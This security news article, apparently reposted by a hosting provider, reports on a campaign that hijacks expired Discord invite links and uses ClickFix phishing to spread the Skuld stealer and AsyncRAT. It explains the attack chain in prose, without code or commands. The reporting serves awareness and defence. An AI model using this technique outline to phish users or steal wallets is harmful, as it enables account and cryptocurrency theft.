A new malware campaign is taking advantage of a flaw in Discord’s invitation system to deliver a malicious information stealer named Skuld and AsyncRAT, a remote access trojan. Attackers have managed to hijack invitation links by registering vanity links, which enables them to redirect users unknowingly from legitimate sources to harmful servers.
According to security researchers from Check Point, this method combines techniques such as ClickFix phishing, multi-stage loading, and time-based evasions. The vulnerability in Discord’s invite mechanism lets cybercriminals take control of expired or deleted invite links, turning previously trusted links into channels for malware delivery. Users who follow these links can easily be led to malicious sites.
Just a month earlier, Check Point identified another phishing scheme that significantly exploited expired vanity invite links, enticing users to join a server while misleading them to a phishing site that drained their digital assets when their wallets were connected.
Discord provides options for users to create temporary, permanent, or custom invite links, but it prevents legitimate servers from reclaiming expired or deleted links. However, the security research revealed that custom invite links could allow for the reuse of these old codes, creating a new set of vulnerabilities.
The attack outline indicates that cybercriminals are seizing invite links initially shared by regular communities to channel users into their malicious servers. Once individuals join, they’re prompted to verify their accounts, leading them to a counterfeit site with a "Verify" button. This button activates JavaScript that copies a PowerShell command to the victim’s clipboard, where they’re then guided to execute it, inadvertently downloading malware.
AsyncRAT provides comprehensive remote control of infected machines, utilizing a dead drop resolver to connect to command-and-control servers through Pastebin. Meanwhile, the Skuld information stealer, written in Golang, is designed to extract sensitive information from Discord, various web browsers, crypto wallets, and gaming platforms.
Skuld also targets crypto wallet seed phrases and passwords from popular wallets by replacing legitimate application files with compromised versions. The attack’s meticulous design includes techniques to bypass browser security measures, allowing the attackers to blend their traffic with legitimate services, thus not raising any red flags.
Check Point reported that the same threat actor is also distributing malware disguised as a hacktool for unlocking pirated games, which has already seen significant downloads. The victims of these attacks appear to be residing primarily in countries such as the United States, Germany, Vietnam, and the United Kingdom.
This campaign underscores the risks related to Discord’s invite system, emphasizing how seemingly minor features can serve as potent attack vectors, especially for cybercriminals focused on stealing cryptocurrency.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.